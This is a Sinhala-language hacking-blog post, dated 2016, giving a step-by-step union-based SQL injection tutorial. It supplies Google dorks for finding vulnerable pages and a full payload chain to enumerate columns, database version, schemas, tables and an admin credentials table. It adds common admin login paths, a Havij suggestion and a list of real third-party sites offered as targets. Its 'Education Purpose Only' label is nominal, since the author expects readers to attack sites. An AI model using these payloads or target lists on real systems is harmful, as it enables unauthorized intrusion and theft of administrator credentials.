Posted by : Mr Elite_x Saturday, January 2, 2016

Vulnerable Site වලට ගේම දෙමු. - SQLi Injection (Education Purpose Only)


ඔන්න ඉතින් මේ කියලා දෙන්න යන්නේ‍ෆට්ටම ගේමක් දෙන විදිහ. අපි මේක සයිට් වලට ගේමක් දෙන්න තමයි භාවිත කරන්නෙ.... මේක ඩේටාබේස් එක ඇතුලට රිංගලා දෙන ගේමක්. ක්‍රමයත් එක්කම කියලා දෙනවා. අර උඩ දාලා තියන එක දැක්කනෙ. (Education Purpose Only) ඒ කිව්වෙ කරන්න බෑ. ඉගෙනගන්න විතරයි කියලා බං... මම කිව්වත් නැතත් උබලා කරනවා. හැබැයි අපේ ෆෝරම්, අපේ බ්ලොග් එකේ නම ගාවලා නම් ගේම් දෙන්න යන්න එපා ඈ....

මේකට කියන්නෙ SQL Injections.. දැන් කියන්න එපා මේකද කියන්නෙ, අපෝ ඕකත් වැඩක්ද කියලා. දන්නවා නම් කටවහගෙන හිටපල්ලා. මේ කියන්නෙ දන්නෙ නැති අයට විතරයි ඈ... SQL Injections කිව්වම අද ඉපදෙන එකා පවා දන්නවා. උබලා දන්නෙ නැත්තම් ඒක උබලගෙ වරදක් නෙවෙයි. මේවා කියලා දෙන්න තහනම් අපේ රටේ පාලකයන්ගෙ අවුලක් ඈ.... මේක ෆුල් ටියුට් එකක්. ඒ නිසා මේක කොහේවත් දාලා නම් අහුවෙන්න එපා. එහෙනම් පටාන් ගමු නේද...!

මොකක්ද මේ SQL Injections කියන්නෙ...?
මේ SQL Injections කියන්නෙ අපේ වෙබ්සයිට් හැදිලා තියන ක්‍රමයක්. මේකෙදි වැරැද්දක් උනොත් අපේ සයිට් එකටම බලපානවා. ඒවගේ තැන් වලට කියන්නෙ Vulnerable SQL Injections කියලා. අන්න ඒවායෙ තියන දෝශ නිසා අපිට පුළුවන් වෙනවා ඒ සයිට් එක ඇතුලට ගිහින් ආතල් ගන්න.

උබලට තේරුනේ නෑ කියලා දන්නවා. මේක නිකන් ගමේ කෑල්ලක් එක්ක සෙට් වෙලා ඉද්දි ඒකිව කොල්ලගෙ ගෙදර නවත්තලා කෙල්ලගෙ දෙමව්පියොයි, කොල්ලගෙ දෙමව්පියොයි මල ගෙදරක යනවා වගේ වැඩක්. ‍මේකෙදි කෙල්ල තමයි Vulnerable Site එක. කොල්ලා තමයි මේ සයිට් එකට ගේම දෙන බුවා. එතකොට කෙල්ලගෙ දෙමව්පියො තමයි සයිට් එකේ Vulnerable.... ආ දැන් තේරුනා නේද...

මේ ක්‍රමේදි අපිට පුළුවන් ඇඩ්මින්ගෙ මේල් එකයි, පාස්වර්ඩ් එකයි හොයාගන්න පුළුවන්. ඒ කියන්නෙ කෙලින්ම Admin Panel එකටම රිංගනවා. ඒ කියන්නෙ මේක ෆෝරම් එකක් නම් අනිත් අයගෙ විස්තර ටික නිකම්ම ලැබෙනවා. එහෙනම් දැන් වැඩේට බහිමු... දැන් කියන්න කියෙන්නෙ VPN එකක්, Proxy එකක් දාගත්තට කමක් නෑ හොදේ...

කොහොමද Vulnerable සයිට් එකක් හොයාගන්නෙ?
මුලින්ම ගූගල් දෙයියා ලගට යන්න. ඊළගට ඉතින් කැමති Dork එකක් සර්ච් කරන්න. මේ ඩෝර්ක් නම් ඇති වෙනකම් තියනවා. ඒත් මම මෙතන දාන්නෙ ටිකයි. අනිත් ටික ඕනෙනම් පහලින් බාගන්න....

inurl:news.php?id=
inurl:event.php?id=
inurl:order.php?id=
inurl:user.php?id=
inurl:restaurant.php?id=
inurl:buy.php?id=

මම අනිත් ඩෝර්ක් ටික පහලින් දාලා තියනවා. ඕනෙනම් ඒ ටික බාගන්න....

මෙන්න අනිත් ඩෝර්ක්ස් ටික....
 Download

දැන් අපිට ලැබෙන රිසාල්ට් වලින් කැමති එකකට යන්න. යන්න කලින් බලහල්ලා ඔය = ලකුණට පස්සෙ තියන ඉලක්කම පොඩ්ඩක් ඈ... 20ට වැඩියි වගේනම් යන්න එපා දෙයියො. මම එහෙම කියපු හේතුව ඉස්සරහට තේරෙයි.

දැන් අපිට සයිට් එකක් තියනවා. මම මේ සයිට් එක ගන්නම්. මම ඩිෆේස් ක‍රලා නෑ... උදාහරනයකට විතරයි.
http://www.hopefullyvulnerablesite.com/event.php?id=1

දැන් මේකෙ පේන්න තියනවා ඔයාලට ලින්ක් එක අගට id?=1 කියලා එකක් තියනවා. අන්න ඒක අගට ' දාලා බලන්න ඔනෙ මොකක් හරි එරර් එකක් එනවද කියලා. මේ විදිහට බලන්න.
http://www.hopefullyvulnerablesite.com/event.php?id=1'

මෙහෙම කරලා බලලා MySQL එරර් එකක් ආවෙ නැත්තම් ඉතින් අපිට බලන්න වෙනවා 2නි එකේ එරර් එකක් තියනවද කියලා. ඒකෙත් තිබුනෙ නැත්තම් දිගට බලන්න වෙනවා. ඒ නිසයි කිව්වෙ 20ට වැඩි ඒවා එපා කියලා.

දැන් අපිට එරර් එකක් ආවා කියලා සලකලා වැඩේ කරමු. ඊළගට අපිට ඕනෙ කරනවා මේ සයිට් එකේ තියන කොලම් ගාන හොයාගන්න. ඒක කරන්නෙ අපි අර ලින්ක් එකම අරගෙන ඒක අගට order by 2-- කියලා දාලා බලන්න. ඒකෙ එරර් එකක් නැත්තම් 3 දාලා බලන්න....

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--
*ERROR*

ඔන්න 5 වෙනි කොලම් එකේ එරර් එකක් තියනවා. ඒ කියන්නෙ මේකෙ තියෙන්නෙ කොලම් 4යි. 5 වෙනි එක නැති නිසා තමයි එරර් එකක් එන්නෙ.

Vulnerable Column එක හොයාගමු
දැන් අපි දන්නවා මේ සයිට් එකේ තියන කොලම් ගාන. දැන් බලන්න හදන්නෙ Vulnerable Column එක මොකක්ද කියලා. දැන් අපි මේකෙ තියන කොලම් සිලෙක්ට් කරගන්නෙ කොහොමද කියලා බලමු.
URL එක අගට union select 1,2,3,4-- කියලා තමයි මට දාගන්න වෙන්නෙ. ඒක කරන්න කලින් කියන්න ඕනෙ අර ?id=1 කියලා තිබුන එක ?id=-1 කියලා දාන්න ඕනෙ. දැන් අර අපි හොයාගත්ත කොලම් එක මුල ඉදන් 1,2,3,4 කියලා දාලා බලනවා.


http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--

විශේෂයි - අර = ලකුණට පස්සෙ "-" දාන්න මතක තියාගනිල්ලා ඈ...
අපි මේක කරද්දි අපිට ඩිස්ප්ලේ වෙනවා කොලම් එකක්. අන්න ඒක තමයි වීක් කොලම් එක. ඒක මතක තියාගන්න.

Database එකේ වර්ෂන් එක බලමු.
දැන් අපි ඩේටාබේස් එකේ වර්ෂන් එක හොයාගන්න ඕනෙ. ඒක හොයාගන්නෙ අපි එකඑක වර්ෂන් එකට යූස් කරන්නෙ එක එක කමාන්ඩ්. ඩේටාබේස් එක වර්ෂන් 5 නම් කිසිම අවුලක් නෑ. ඊට උඩ නම් කොහෙත්ම අවුලක් නෑ. ඒත් පහල එකක් නම් පොඩ්ඩක් අවුල්. මේ කමාන්ඩ් වැඩ කරන්නෙ 5 හෝ 5ට වැඩි නම් විතරයි. එහෙම කිව්වා කියලා අවුලක් ගන්න එපා. මම අවසානයට දෙනවා සයිට් 2, 3ක්....

ඒකට කලින් ලින්ක් එකම අරගෙන අර අපිට ඩිස්ප්ලේ කරපු කොලම් එක තියන තැනට @@Version කියලා දාගන්න.

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--

මට මේකෙ පෙන්නුවේ 2නි කොලම් එක නම් ඒක තමයි මෙතනට දාලා තියෙන්නෙ. පේනවනෙ 2 වෙනුවට @@Version දාලා තියනවා.
දැන් අපිට පෙන්වනවා මේකෙ වර්ෂන් එක... මේ වගේ එකක් පෙන්වයි.
5.1.47-community-log

මේක වර්ෂන් 5. ඒ නිසා කිසිම අවුලක් නෑ. අපේ වැඩේ කරන්න පුළුවන්.

ඩේටාබේස් එකේ නම හොයමු.
මේක ගොඩක් වැදගත් දෙයක්. මේක නැතුව ඇත්තටම වැඩේ කරන්න බෑ. මේ දෙන කෝඩ් එක ලින්ක් එකේ අගට දාගෙන බලන්න. මේක වෙනස් කරගන්න විදිහ කියලා දෙන්න ඒනෙ නෑනෙ.


http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--

group_concat(schema_name) - කලින් @@version තිබුන තැනට මේක දාන්න.
from information_schema.schemata-- - මේ ටික වෙනස් නොකර දාන්න...

දැන් මේ ටිකත් ඒ විදිහටම කරන්න.

Quote:http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--
concat(database()) - වීක් කොලම් එක තිබුන තැනට මේක දාගන්න.

දැන් හරි මේ ටික කරගත්තා කියන්නෙ වැඩේ ඉවරයි වගේ තමයි. මේකෙදි අපිට පෙන්වයි ඩේටාබේස් එකේ නම...

ඩේටාබේස් එකේ Table විවෘත කරමු.
දැන් අපි ඩේටාබේස් එකේ ටේබල් ටික බලන්න තමයි හදන්නෙ. මේක තමයි ටිකක් දිග කෝඩ් එක.

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

group_concat(table_name) - වීක් කොලම් එක තිබුන තැනට දාන්න.
FROM information_schema.tables WHERE table_schema=database()-- - වෙනස් නොකර තියන්න.

දැන් අපිට ඩේටාබේස් එකේ කොලම් පෙන්වනවා.

Table වල තොරතුරු බලමු.
මේකෙදි අපි කරන්නෙ ටේබල් වල තොරතුරු මොනවද කියලා බලන එකයි. හැබැයි බලන්නෙ ඇඩ්මින්ගෙ විස්තර විතරයි ඈ. ඒක තිබුනම ඇතිනෙ.

Quote:http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"

වෙනස් කරන ඒවා කියන්න යන්නෙ නෑ. දැන් දන්නවනෙ.

මේක කරද්දි එරර් එකක් ආවොත් අපිට මේ admin_credentials එක Hex කරන්න වෙනවා. ඕවට ඉතින් ලේසි ක්‍රම තියනවා. මේ සයිට් එකට ගිහින් බලහල්ලකො.
swingnote

ඒක කලාම එන්නෙ මෙන්න මේ වගේ එකක්.

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73

දැන් අපිට පෙන්වනවා ගින්දර වගේ Username එකයි Password එකයි. ඕක ගහලා ලොග් වෙන්න තියෙන්නෙ. ඇඩ්මින් පැනල් එක හොයාගන්න බැරිනම් Havij හරි අර මම කලින් දුන්න පෝස්ට් එකේ තිබුන ලොග්ස් හරි යූස් කරන්න. මේ ටික තමයි නිතරම එන්නෙ....

/admin
/admin.php
/login.php
/admin/index.php
/login/index.php
/adminlogin
/adminlogin.php
/adminlogin/index.php
/moderator.php
/moderator
/modlogin

සමහරවිට ඕවායේ පාස් එක MD5 වලින් ඇති. එහෙම උනොත් මේකට කමෙන්ට් එකක් විදිහට දාන්න මම හදලා දෙන්නම්...

මෙන්න මගෙ ගානෙ සයිට් ටිකක්....

http://www.orthphoto.net/user.php?id=1
www.nezzwerk.com/seven/user.php?id=1
http://www.ias100.in/news_details.php?id=231'
www.ukdota.net/user.php?id=1
www.etaew.net/trove/user.php?id=1


අනිත් කාරනේ තමයි මේකෙන් ඩවුන් කරන සයිට් එකකවත් අපේ නම ගෑවෙන්න බෑ. ඒ වගේම මේ පෝස්ට් එක වෙන කොහේවත් දාන්නත් බෑ හොදේ... මේක Education Purpose Only.

MD5 වලින් තියන පාස්වර්ඩ් එක මට කියලා ඇරගන්න ලැජ්ජයි වගේ නම් මේකෙන් ගිහින් කරගනිල්ලා.

ඒ වගේම Vuln සයිට් එකක් හොයාගන්න SQLi Scanner එකක් යූස් කරන්නත් පුළුවන්....

මම එච්චරම වැඩ්ඩෙක් කියලා හිතන්න එපා. අදකාලෙ ඉපදෙන එකත් මේවා ගැන දන්නවා ඈ....

එහෙනම් හැපී හැකින් ඈ....

මොකක් හරි උදවුවක් ඕනෙ නම් කමෙන්ට් කරන්න....

Leave a Reply

කමෙන්ට් එකක් දාගෙන යන්න...

Subscribe to Posts | Subscribe to Comments

Welcome to My Blog

ආ ගිය ගණන

Powered by Blogger.

- Copyright © ※ Elite Hackz ※ -Robotic Notes- Powered by Blogger - Designed by Johanes Djogan -